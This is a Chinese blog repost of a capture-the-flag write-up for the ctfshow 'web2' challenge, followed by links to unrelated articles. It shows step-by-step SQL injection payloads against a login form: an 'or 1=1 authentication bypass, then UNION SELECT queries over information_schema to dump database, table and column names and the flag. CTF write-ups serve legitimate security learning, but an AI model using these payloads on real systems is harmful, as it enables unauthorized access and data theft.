ctfshow web web2
2021/8/29 23:06:43
本文主要是介绍ctfshow web web2,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
打开容器,发现一个登陆框
输入admin 密码随便输入,用burp抓包,发送到Repeater模块
首先试试万能密码:’or 1=1# username=admin'or 1=1#&password=123 发现登陆成功
接着查看回显位置:username=admin'or 1=1 union select 1,2,3#&password=123
发现有回显
接着就爆库爆表爆数据
爆库:username=admin'or 1=1 union select 1,database(),3#&password=123
发现数据库位web2
爆表名爆表admin'or 1=1 union select 1,group_concat(table_name),3(1,2,3是回显位置,哪个位置有回显就在哪个地方写group...) from information_schema.tables where table_schema='查询到的数据库名'
成功爆出flag跟user
接着爆字段admin'or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='要查询的字段名'
发现flag字段
接下来就直接查找flag字段下面的数据
爆数据admin'or 1=1 union select 1,要爆的数据,3 from 爆出的字段名
成功拿到flag
这篇关于ctfshow web web2的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-09-28pyqt 怎么打包整个项目-icode9专业技术文章分享
- 2024-09-28laravel Commands 创建带有参数的 Artisan 命令的步骤和示例-icode9专业技术文章分享
- 2024-09-28antd怎么实现渲染tiff图片-icode9专业技术文章分享
- 2024-09-28英文半角中划线和中文全角的中划线有什么区别-icode9专业技术文章分享
- 2024-09-28nvm npm 和node 他们之间有什么关系-icode9专业技术文章分享
- 2024-09-28Node Version Manager (nvm)使用教程-icode9专业技术文章分享
- 2024-09-28nvm命令太慢,是什么原因-icode9专业技术文章分享
- 2024-09-28Kotlin 如何增加、删除和修改 MutableStateFlow 中的值。-icode9专业技术文章分享
- 2024-09-28Kotlin的stateFlow.update 写法介绍-icode9专业技术文章分享
- 2024-09-28kotlin 怎么获取当前时间格式-icode9专业技术文章分享